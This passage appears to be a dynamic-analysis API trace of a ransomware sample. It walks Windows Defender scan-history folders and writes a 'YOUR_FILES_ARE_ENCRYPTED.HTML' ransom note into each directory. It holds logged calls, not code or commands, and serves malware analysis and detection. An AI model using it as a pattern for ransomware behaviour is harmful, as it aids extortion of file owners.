lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.676] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.676] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="100017", cAlternateFileName="")) returned 1 [0107.676] StrStrIW (lpFirst="100017", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.676] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\100017") returned 86 [0107.676] PathFindExtensionW (pszPath="100017") returned="" [0107.677] lstrlenW (lpString="") returned 0 [0107.677] PathFindExtensionW (pszPath="100017") returned="" [0107.677] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="260", cAlternateFileName="")) returned 1 [0107.677] StrStrIW (lpFirst="260", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.677] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\260") returned 83 [0107.677] PathFindExtensionW (pszPath="260") returned="" [0107.677] lstrlenW (lpString="") returned 0 [0107.677] PathFindExtensionW (pszPath="260") returned="" [0107.677] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="260", cAlternateFileName="")) returned 0 [0107.677] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.677] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.677] GetProcessHeap () returned 0x600000 [0107.677] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.678] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\21\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\21\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.678] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.680] CloseHandle (hObject=0x308) returned 1 [0107.680] GetProcessHeap () returned 0x600000 [0107.680] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.680] GetProcessHeap () returned 0x600000 [0107.680] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.682] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="22", cAlternateFileName="")) returned 1 [0107.682] StrStrIW (lpFirst="22", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.682] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22") returned 79 [0107.682] GetProcessHeap () returned 0x600000 [0107.682] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.683] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22" [0107.683] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\*" [0107.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.684] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="..", cAlternateFileName="")) returned 1 [0107.684] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="100018", cAlternateFileName="")) returned 1 [0107.684] StrStrIW (lpFirst="100018", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.684] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\100018") returned 86 [0107.684] PathFindExtensionW (pszPath="100018") returned="" [0107.684] lstrlenW (lpString="") returned 0 [0107.684] PathFindExtensionW (pszPath="100018") returned="" [0107.685] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="109003", cAlternateFileName="")) returned 1 [0107.685] StrStrIW (lpFirst="109003", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.685] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\109003") returned 86 [0107.685] PathFindExtensionW (pszPath="109003") returned="" [0107.685] lstrlenW (lpString="") returned 0 [0107.685] PathFindExtensionW (pszPath="109003") returned="" [0107.685] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="109006", cAlternateFileName="")) returned 1 [0107.685] StrStrIW (lpFirst="109006", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.685] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\109006") returned 86 [0107.685] PathFindExtensionW (pszPath="109006") returned="" [0107.685] lstrlenW (lpString="") returned 0 [0107.685] PathFindExtensionW (pszPath="109006") returned="" [0107.685] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="323", cAlternateFileName="")) returned 1 [0107.685] StrStrIW (lpFirst="323", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.685] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\323") returned 83 [0107.685] PathFindExtensionW (pszPath="323") returned="" [0107.685] lstrlenW (lpString="") returned 0 [0107.685] PathFindExtensionW (pszPath="323") returned="" [0107.685] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x632a08, dwReserved1=0x640130, cFileName="323", cAlternateFileName="")) returned 0 [0107.685] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0107.685] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0107.685] GetProcessHeap () returned 0x600000 [0107.685] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.686] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\22\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\22\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.686] WriteFile (in: hFile=0x308, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0107.687] CloseHandle (hObject=0x308) returned 1 [0107.688] GetProcessHeap () returned 0x600000 [0107.688] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.688] GetProcessHeap () returned 0x600000 [0107.688] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.689] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401aa, dwReserved1=0x640128, cFileName="22", cAlternateFileName="")) returned 0 [0107.689] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0107.689] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0107.689] GetProcessHeap () returned 0x600000 [0107.689] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0107.690] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0107.690] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0107.691] CloseHandle (hObject=0x310) returned 1 [0107.691] GetProcessHeap () returned 0x600000 [0107.691] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0107.691] GetProcessHeap () returned 0x600000 [0107.692] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0107.692] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="MputHistory", cAlternateFileName="MPUTHI~1")) returned 0 [0107.692] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0107.692] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0107.692] GetProcessHeap () returned 0x600000 [0107.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.693] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\mput\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.693] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.694] CloseHandle (hObject=0x32c) returned 1 [0107.694] GetProcessHeap () returned 0x600000 [0107.694] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.694] GetProcessHeap () returned 0x600000 [0107.694] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.695] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="RemCheck", cAlternateFileName="")) returned 1 [0107.695] StrStrIW (lpFirst="RemCheck", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.695] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck") returned 68 [0107.695] GetProcessHeap () returned 0x600000 [0107.695] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.697] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck" [0107.697] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\*" [0107.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0107.697] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.697] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 0 [0107.697] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0107.697] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0107.697] GetProcessHeap () returned 0x600000 [0107.697] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0107.698] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\RemCheck\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\remcheck\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.698] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.699] CloseHandle (hObject=0x32c) returned 1 [0107.699] GetProcessHeap () returned 0x600000 [0107.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0107.699] GetProcessHeap () returned 0x600000 [0107.699] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.700] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f938, dwReserved1=0x318f8d0, cFileName="Results", cAlternateFileName="")) returned 1 [0107.700] StrStrIW (lpFirst="Results", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.700] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 67 [0107.700] GetProcessHeap () returned 0x600000 [0107.700] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.701] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0107.701] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*" [0107.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0107.702] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x318f8d8, cFileName="..", cAlternateFileName="")) returned 1 [0107.702] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf141f151, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf141f151, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf141f151, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, 